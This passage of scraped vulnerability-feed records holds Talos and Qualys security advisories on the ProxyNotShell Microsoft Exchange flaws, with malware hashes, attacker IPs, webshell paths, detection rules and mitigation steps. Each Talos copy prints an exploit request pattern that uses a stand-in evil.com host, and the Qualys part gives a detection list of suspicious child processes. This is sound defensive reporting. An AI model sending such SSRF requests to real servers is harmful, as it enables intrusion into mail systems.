Convention Centre, Singapore \n\n \n\n\n**_[Conference On Applied Machine Learning For Information Security](<https://www.camlis.org/>) _**** (Oct. 20 - 21)**\n\nSands Capital Management, Arlington, Virginia \n\n \n\n\n## Most prevalent malware files from Talos telemetry over the past week \n\n** \n**\n\n**SHA 256: **[c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0](<https://www.virustotal.com/gui/file/c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0/details>) \n\n**MD5: **8c69830a50fb85d8a794fa46643493b2 \n\n**Typical Filename: **AAct.exe \n\n**Claimed Product: **N/A \n\n**Detection Name: **PUA.Win.Dropper.Generic::1201 \n\n** \n**\n\n**SHA 256: **[e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>)** \n****MD5: **93fefc3e88ffb78abb36365fa5cf857c ** \n****Typical Filename: **Wextract \n**Claimed Product: **Internet Explorer \n**Detection Name: **PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg \n\n \n\n\n**SHA 256: **[58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681](<https://www.virustotal.com/gui/file/58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681/details>) \n\n**MD5: **f1fe671bcefd4630e5ed8b87c9283534 \n\n**Typical Filename: **KMSAuto Net.exe \n\n**Claimed Product: **KMSAuto Net \n\n**Detection Name: **PUA.Win.Tool.Hackkms::1201 \n\n** \n**\n\n**SHA 256: **[e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details>)** **\n\n**MD5: **a087b2e6ec57b08c0d0750c60f96a74c\n\n**Typical Filename: **AAct.exe** **\n\n**Claimed Product: **N/A \n\n**Detection Name: **PUA.Win.Tool.Kmsauto::1201 \n\n** \n**\n\n**SHA 256: **[63d543945e33b4b6088dc34d0550213dc73ea6acce248d8353c63039e8fa284f](<https://www.virustotal.com/gui/file/63d543945e33b4b6088dc34d0550213dc73ea6acce248d8353c63039e8fa284f/details>) \n\n**MD5: **a779d230c944ef200bce074407d2b8ff \n\n**Typical Filename: **mediaget.exe** **\n\n**Claimed Product: **MediaGet \n\n**Detection Name: **W32.File.MalParent", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Oct. 6, 2022) \u2014 Continuing down the Privacy Policy rabbit hole", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T18:00:00", "id": "TALOSBLOG:12103F398364269083FD96139F0F6562", "href": "http://blog.talosintelligence.com/2022/10/threat-source-newsletter-oct-6-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-26T20:06:00", "description": "\n\nCisco Talos has released new coverage to detect and prevent the exploitation of two recently [disclosed](<https://www.microsoft.com/en-us/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) vulnerabilities collectively referred to as "ProxyNotShell," affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) is a Server Side Request Forgery (SSRF) vulnerability, while [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers. \n \nWhile no fixes or patches are available yet, Microsoft has [provided mitigations](<https://www.microsoft.com/en-us/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. Cisco Talos is closely monitoring the recent reports of exploitation attempts against these vulnerabilities and strongly recommends users implement mitigation steps while waiting for security patches for these vulnerabilities. Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The [Hafnium threat actor](<https://blog.talosintelligence.com/hafnium-update/>) exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was [one of the four attacks they saw most often](<https://www.techtarget.com/searchsecurity/news/252502308/Cisco-Talos-Exchange-Server-flaws-accounted-for-35-of-attacks>) last year.\n\n## Vulnerability details and ongoing exploitation\n\n \nExploit requests for these vulnerabilities look similar to previously discovered ProxyShell exploitation attempts: \n \nautodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com \n \nSuccessful exploitation of the vulnerabilities observed in the wild leads to preliminary information-gathering operations and the persistence of WebShells for continued access to compromised servers. Open-source reporting indicates that webShells such as Antsword, a popular Chinese language-based open-source webshell, [SharPyShell](<https://github.com/antonioCoco/SharPyShell>) an ASP.NET-based webshell and [China Chopper](<https://blog.talosintelligence.com/china-chopper-still-active-9-years-later/>) have been deployed on compromised systems consisting of the following artifacts:\n\n * C:\\inetpub\\wwwroot\\aspnet_client\\Xml.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorEE.aspx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\pxh4HG1v.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx\n\n \n \nThis activity is consistent with what is typically observed when attackers begin leveraging vulnerabilities in unpatched or vulnerable systems exposed to the internet. \n \nInitial reporting observed the download and deployment of additional malicious artifacts and implants on the infected systems using cert util, however, these TTPs may change as more threat actors start exploiting the vulnerabilities followed by their own set of post-exploitation activities.\n\n## Coverage\n\n \nWays our customers can detect and block this threat are listed below.\n\n\n\n \n[Cisco Secure Endpoint](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>) (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free [here.](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/free-trial.html?utm_medium=web-referral?utm_source=cisco&utm_campaign=amp-free-trial&utm_term=pgm-talos-trial&utm_content=amp-free-trial>) \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Cisco Secure Email](<https://www.cisco.com/c/en/us/products/security/email-security/index.html>) (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free [here](<https://www.cisco.com/c/en/us/products/security/cloud-mailbox-defense?utm_medium=web-referral&utm_source=cisco&utm_campaign=cmd-free-trial-request&utm_term=pgm-talos-trial>). \n \n[Cisco Secure Firewall](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>) (formerly Next-Generation Firewall and Firepower NGFW) appliances such as [Threat Defense Virtual](<https://www.cisco.com/c/en/us/products/collateral/security/firepower-ngfw-virtual/datasheet-c78-742858.html>), [Adaptive Security Appliance](<https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html>) and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[Cisco Secure Malware Analytics](<https://www.cisco.com/c/en/us/products/security/threat-grid/index.html>) (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. \n \n[Umbrella](<https://umbrella.cisco.com/>), Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella [here](<https://signup.umbrella.com/?utm_medium=web-referral?utm_source=cisco&utm_campaign=umbrella-free-trial&utm_term=pgm-talos-trial&utm_content=automated-free-trial>). \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. \n \nAdditional protections with context to your specific environment and threat data are available from the [Firewall Management Center](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>). \n \n[Cisco Duo](<https://signup.duo.com/?utm_source=talos&utm_medium=referral&utm_campaign=duo-free-trial>) provides multi-factor authentication for users to ensure only those authorized are accessing your network. \n \nCisco Talos is releasing SID **60642 **to protect against CVE-2022-41040. \n \nIn addition we are releasing SIDs **60637-60641 **to protect against malicious activity observed during exploitation of CVE-2022-41082. \n \nThe existing SIDs **27966-27968, 28323, 37245, and 42834-42838 **provide additional protection for the malicious activity observed during exploitation of CVE-2022-41082. \n \nThe following ClamAV signatures have been released to detect malware artifacts related to this threat:\n\n * Asp.Backdoor.AntSword-9972727-1\n * Asp.Backdoor.Awen-9972728-0\n * Asp.Backdoor.AntSword-9972729-0\n\n## IOCs\n\n### IPs and URLs\n\n125[.]212[.]220[.]48 \n5[.]180[.]61[.]17 \n47[.]242[.]39[.]92 \n61[.]244[.]94[.]85 \n86[.]48[.]6[.]69 \n86[.]48[.]12[.]64 \n94[.]140[.]8[.]48 \n94[.]140[.]8[.]113 \n103[.]9[.]76[.]208 \n103[.]9[.]76[.]211 \n104[.]244[.]79[.]6 \n112[.]118[.]48[.]186 \n122[.]155[.]174[.]188 \n125[.]212[.]241[.]134 \n185[.]220[.]101[.]182 \n194[.]150[.]167[.]88 \n212[.]119[.]34[.]11 \n137[.]184[.]67[.]33 \n206[.]188[.]196[.]77 \nhxxp://206[.]188[.]196[.]77:8080/themes.aspx", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T21:16:00", "type": "talosblog", "title": "Threat Advisory: Microsoft warns of actively exploited vulnerabilities in Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T21:16:00", "id": "TALOSBLOG:A52D0C18F59637804E33FC802E4F7F00", "href": "https://blog.talosintelligence.com/threat-advisory-microsoft-warns-of-actively-exploited-vulnerabilities-in-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-04T06:04:38", "description": "## \n\n \nCisco Talos has released new coverage to detect and prevent the exploitation of two recently [disclosed](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) vulnerabilities collectively referred to as \"ProxyNotShell,\" affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. [CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name%3D2022-41040>) is a Server Side Request Forgery (SSRF) vulnerability, while [CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name%3DCVE-2022-41082>) enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers. \n \nWhile no fixes or patches are available yet, Microsoft has [provided mitigations](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. Cisco Talos is closely monitoring the recent reports of exploitation attempts against these vulnerabilities and strongly recommends users implement mitigation steps while waiting for security patches for these vulnerabilities. Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The [Hafnium threat actor](<https://blog.talosintelligence.com/2021/03/hafnium-update.html>) exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was [one of the four attacks they saw most often](<https://blog.talosintelligence.com/2022/01/talos-incident-response-year-in-review.html>) last year. \n \n \n\n\n## Vulnerability details and ongoing exploitation\n\n \nExploit requests for these [vulnerabilities](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) look similar to previously discovered ProxyShell exploitation attempts: \n \nautodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com \n \nSuccessful exploitation of the vulnerabilities observed in the wild leads to preliminary information-gathering operations and the persistence of WebShells for continued access to compromised servers. [Open-source reporting](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) indicates that webShells such as Antsword, a popular Chinese language-based open-source webshell, [SharPyShell](<https://github.com/antonioCoco/SharPyShell>) an ASP.NET-based webshell and [China Chopper](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>) have been deployed on compromised systems consisting of the following artifacts: \n \n\n\n * C:\\inetpub\\wwwroot\\aspnet_client\\Xml.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorEE.aspx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\pxh4HG1v.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx\n \n \nThis activity is consistent with what is typically observed when attackers begin leveraging vulnerabilities in unpatched or vulnerable systems exposed to the internet. \n \nInitial reporting observed the download and deployment of additional malicious artifacts and implants on the infected systems using certutil, however these TTPs may change as more threat actors start exploiting the vulnerabilities followed by their own set of post-exploitation activities. \n \n\n\n## Coverage\n\n \n\n\nWays our customers can detect and block this threat are listed below. \n \n\n\n\n\n \n \n[Cisco Secure Endpoint](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>) (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free [here.](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/free-trial.html?utm_medium%3Dweb-referral?utm_source%3Dcisco%26utm_campaign%3Damp-free-trial%26utm_term%3Dpgm-talos-trial%26utm_content%3Damp-free-trial>) \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Cisco Secure Email](<https://www.cisco.com/c/en/us/products/security/email-security/index.html>) (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free [here](<https://www.cisco.com/c/en/us/products/security/cloud-mailbox-defense?utm_medium%3Dweb-referral%26utm_source%3Dcisco%26utm_campaign%3Dcmd-free-trial-request%26utm_term%3Dpgm-talos-trial>). \n \n[Cisco Secure Firewall](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>) (formerly Next-Generation Firewall and Firepower NGFW) appliances such as [Threat Defense Virtual](<https://www.cisco.com/c/en/us/products/collateral/security/firepower-ngfw-virtual/datasheet-c78-742858.html>), [Adaptive Security Appliance](<https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html>) and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[Cisco Secure Malware Analytics](<https://www.cisco.com/c/en/us/products/security/threat-grid/index.html>) (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. \n \n[Umbrella](<https://umbrella.cisco.com/>), Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella [here](<https://signup.umbrella.com/?utm_medium%3Dweb-referral?utm_source%3Dcisco%26utm_campaign%3Dumbrella-free-trial%26utm_term%3Dpgm-talos-trial%26utm_content%3Dautomated-free-trial>). \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. \n \nAdditional protections with context to your specific environment and threat data are available from the [Firewall Management Center](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>). \n \nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \nCisco Talos is releasing SID **60642 **to protect against CVE-2022-41040. \n \nIn addition we are releasing SIDs **60637-60641** to protect against malicious activity observed during exploitation of CVE-2022-41082. \n \nThe existing SIDs **27966-27968, 28323, 37245, and 42834-42838** provide additional protection for the malicious activity observed during exploitation of CVE-2022-41082. \n \nThe following ClamAV signatures have been released to detect malware artifacts related to this threat: \n \n\n\n * Asp.Backdoor.AntSword-9972727-1\n * Asp.Backdoor.Awen-9972728-0\n * Asp.Backdoor.AntSword-9972729-0\n \n \n\n\n## IOCs\n\n### IPs and URLs\n\n125[.]212[.]220[.]48 \n5[.]180[.]61[.]17 \n47[.]242[.]39[.]92 \n61[.]244[.]94[.]85 \n86[.]48[.]6[.]69 \n86[.]48[.]12[.]64 \n94[.]140[.]8[.]48 \n94[.]140[.]8[.]113 \n103[.]9[.]76[.]208 \n103[.]9[.]76[.]211 \n104[.]244[.]79[.]6 \n112[.]118[.]48[.]186 \n122[.]155[.]174[.]188 \n125[.]212[.]241[.]134 \n185[.]220[.]101[.]182 \n194[.]150[.]167[.]88 \n212[.]119[.]34[.]11 \n137[.]184[.]67[.]33 \n206[.]188[.]196[.]77 \nhxxp://206[.]188[.]196[.]77:8080/themes.aspx", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T21:16:00", "type": "talosblog", "title": "Threat Advisory: Microsoft warns of actively exploited vulnerabilities in Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-03T13:40:20", "id": "TALOSBLOG:A0B0983119E043D75EA7712A7172A942", "href": "http://blog.talosintelligence.com/2022/09/threat-advisory-exchange-server-vulns.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2022-10-11T12:05:09", "description": "On September 29, 2022, active attacks against Microsoft Exchange were reported by Vietnamese cybersecurity company GTSC. The researcher at GTSC reported two critical vulnerabilities (now named \u201cProxyNotShell\u201d) in Microsoft Exchange Server via two advisories issued by [Zero Day Initiative](<https://www.zerodayinitiative.com/advisories/upcoming/>): [ZDI-CAN-18333](<https://www.zerodayinitiative.com/advisories/upcoming/#:~:text=by%3A%20Marcin%20Wiazowski-,ZDI%2DCAN%2D18333,-Microsoft>) and [ZDI-CAN-18802](<https://www.zerodayinitiative.com/advisories/upcoming/#:~:text=Zero%20Day%20Initiative-,ZDI%2DCAN%2D18802,-Microsoft>).\n\nThe first flaw (CVE-2022-41040) is a Server-Side Request Forgery (SSRF) vulnerability. The second flaw (CVE-2022-41082) allows remote code execution (RCE) when PowerShell is accessible to the attacker. Microsoft mentions that authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either of the two vulnerabilities. \n\nOn September 30, 2022, Microsoft released an [advisory](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) acknowledging that they are _\u201caware of limited targeted attacks using the two vulnerabilities to get into users\u2019 systems.\u201d_\n\nThreat actors are chaining these two zero-day vulnerabilities to deploy Chinese Chopper web shells on vulnerable Microsoft Exchange Servers for persistence and data theft. Based on the code on these web shells, GTSC suspects that these threat actors are based in China. As a result, CISA has added these vulnerabilities to its list of [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nThese vulnerabilities affect the following versions of Exchange Server:\n\n * Exchange Server 2013\n * Exchange Server 2016\n * Exchange Server 2019\n\n## Qualys Vulnerability Coverage (QID)\n\nQualys customers can use the following QID to identify potentially vulnerable assets in their environments.\n\n**QID**| **Title**| Release Versions \n---|---|--- \n50122| Microsoft Exchange Server Multiple Vulnerabilities (Zero Day)| VULNSIGS-2.5.596-5 or later and QAGENT-SIGNATURE-SET-2.5.596.5-4 or later \n \n## Detect ProxyNotShell Using Qualys VMDR\n\nHere are the steps that your organization can take to rapidly respond to the zero-day threat of ProxyNotShell using Qualys VMDR.\n\n### Identify Microsoft Exchange Server Assets****\n\nThe first step in managing these critical vulnerabilities and reducing risk is identification of your potentially vulnerable assets. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) makes it easy to identify Windows Exchange Server systems.\n\nUse the following Qualys Query Language (QQL) string:\n\n_operatingSystem.category:Server and operatingSystem.category1:`Windows` and software:(name:Microsoft Exchange Server)_\n\nQualys CSAM displays inventory of all Microsoft Exchange Server assets\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, for example: \u201cProxyNotShell Exchange Server 0-day\u201d. This helps in automatically grouping existing hosts with the zero-days as well as any new Windows Exchange Server that is provisioned in your environment. Tagging makes these grouped assets available for querying, reporting, and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\nUsing the VMDR Dashboard, you can track \u2018Exchange 0-day\u2019, impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment using the Exchange Server 0-Day Dashboard.\n\n**Read the Article (Qualys Customer Portal)**: [ProxyNotShell Exchange Server 0-Day Dashboard | Critical Global View](<https://success.qualys.com/support/s/article/000006994>)\n\n Exchange Server 0-Day Dashboard in Qualys VMDR\n\n### Discover ProxyNotShell Exchange Server Zero-Day Vulnerabilities****\n\nNow that hosts running Microsoft Exchange Server are identified, you will want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like these based on the always up-to-date Qualys KnowledgeBase (KB).\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Exchange Server 0-day\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\n_VMDR query: vulnerabilities.vulnerability.qid: 50122_\n\nQualys VMDR isolates all Exchange Server assets with the vulnerability QID 50122\n\nQID 50122 is available in signature version VULNSIGS-2.5.596-5 and above. It can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.5.596.5-4 and above.\n\n## Microsoft Guidance for Risk Mitigation of ProxyNotShell****\n\nMicrosoft has released [Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server [msrc-blog.microsoft.com]](<https://urldefense.com/v3/__https:/msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/__;!!Pw1rFClp!uMi4DoMkOqqFrUWPAWLwADPST1cL7Me88BZ3s_42Deankj3Bhue8qpgtSpj5hBv8jRjKOAsQe0cLPztgFzi-Eeyr$>). According to the blog post, \u201cMicrosoft is aware of limited targeted attacks using the two vulnerabilities to get into users\u2019 systems.\u201d The two vulnerabilities are CVE-2022-41040 and CVE-2022-41082, affecting on-premises Microsoft Exchange Server 2013, 2016, and 2019.\n\nNote: Microsoft Exchange Online is not affected. \n\nAn attacker could exploit these vulnerabilities to take control of an affected system.\n\n### Remediation/Mitigation of ProxyNotShell\n\n[Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) and [Qualys Custom Assessment and Remediation](<https://www.qualys.com/apps/custom-assessment-remediation/>) (CAR) customers can leverage the scripting capabilities of both products to deploy mitigation actions to their Exchange Servers.\n\nBy leveraging Qualys CAR\u2019s scripting capabilities or Patch Management's pre-actions capabilities, customers can deploy a PowerShell script to apply the mitigations recommended by Microsoft.\n\nRefer to the Qualys scripting library on GitHub for [the mitigation script](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Zero%20Day/CVE-2022-41040%2C41082\\(ProxyNotShell%20Microsoft%20Exchange%20Server\\)>) and execute it via Qualys CAR on required assets.\n\nAs per the mitigation introduced by MS, Qualys Policy Compliance customers can evaluate mitigation on MS Exchange targets with control:\n\n**24782 Status of the 'URL Rewrite Instructions' configured for the site and applications**\n\n\n\n**24802 Status of the 'Remote PowerShell access' setting enabled for users**\n\n\n\n## Detect Malicious Behavior related to ProxyNotShell using Qualys Multi-Vector EDR\n\nBased on the post-exploitation activity from multiple threat actors, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) customers can hunt for the following malicious activities: \n\n 1. Detecting usual children of w3wp.exe such as: \n * csc.exe \n * transcodingservice.exe \n * werfault.exe \n * powershell \n * powershell_ise \n * python \n * curl.exe \n 2. Detecting webshell-like files with the following extensions being written on an Exchange Server: \n * .ashx \n * .aspx \n * .asmx \n * .asax \n\n## Detect Exploitation Attempts related to ProxyNotShell using Qualys Context XDR \n\nInterested [Qualys Context XDR](<https://www.qualys.com/apps/extended-detection-response/>) customers can contact their Technical Account Managers for the following rules: \n\n 1. T1190 - [Akamai WAF] ProxyNotShell RCE Vulnerability Exploitation Detected (CVE-2022-41040/CVE-2022-41082) \n 2. T1190 - ProxyNotShell RCE Vulnerability Exploitation Detected (CVE-2022-41040/CVE-2022-41082) \n 3. T1190 - [Trend Micro TippingPoint IPS] ProxyNotShell RCE Vulnerability Exploitation Detected \n 4. T1190 - ProxyNotShell RCE Vulnerability Exploitation Detected via Firewall (CVE-2022-41040/CVE-2022-41082) \n\nWith Qualys Context XDR, customers have the power to write their own detections as well. An example of a generic rule that detects ProxyNotShell attempts is shown below: \n\n\n\n## Indicators of Compromise (IOCs) for ProxyNotShell\n\n**Filenames**| **SHA256 Hash**| **Path** \n---|---|--- \nPxh4HG1v.ashx| c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nRedirSuiteServiceProxy.aspx| 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nRedirSuiteServiceProxy.aspx| b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nxml.ashx| c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1| \nerrorEE.aspx| be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nDll.dll| 074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82| \nDll.dll| 45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9| \nDll.dll| 9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0| \nDll.dll| 29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3| \nDll.dll| C8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2| \n180000000.dll| 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e| \n \n## Contributors\n\n * [Bharat Jogi](<https://blog.qualys.com/author/bharat_jogi>), Director, Vulnerability and Threat Research, Qualys\n * [Mehul Revankar](<https://blog.qualys.com/author/mRevankar>), VP, Product Management & Engineering for VMDR, Qualys\n * [Mayuresh Dani](<https://blog.qualys.com/author/mayuresh>), Manager, Threat Research, Qualys\n * [Lavish Jhamb](<https://blog.qualys.com/author/ljhamb>), Solution Architect, Compliance Solutions, Qualys\n * [Eran Livne](<https://blog.qualys.com/author/elivne>), Senior Director, Endpoint Remediation, Qualys\n * Mukesh Choudhary, Compliance Research Analyst, Qualys\n * Mohd Anas Khan, Compliance Research Analyst, Qualys\n * Arun Pratap Singh, Engineer, Threat Research, Qualys\n * David Lu, Senior Engineer, Threat Research, Qualys\n * Felix Jimenez Saez, Director, Product Management. Qualys", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": 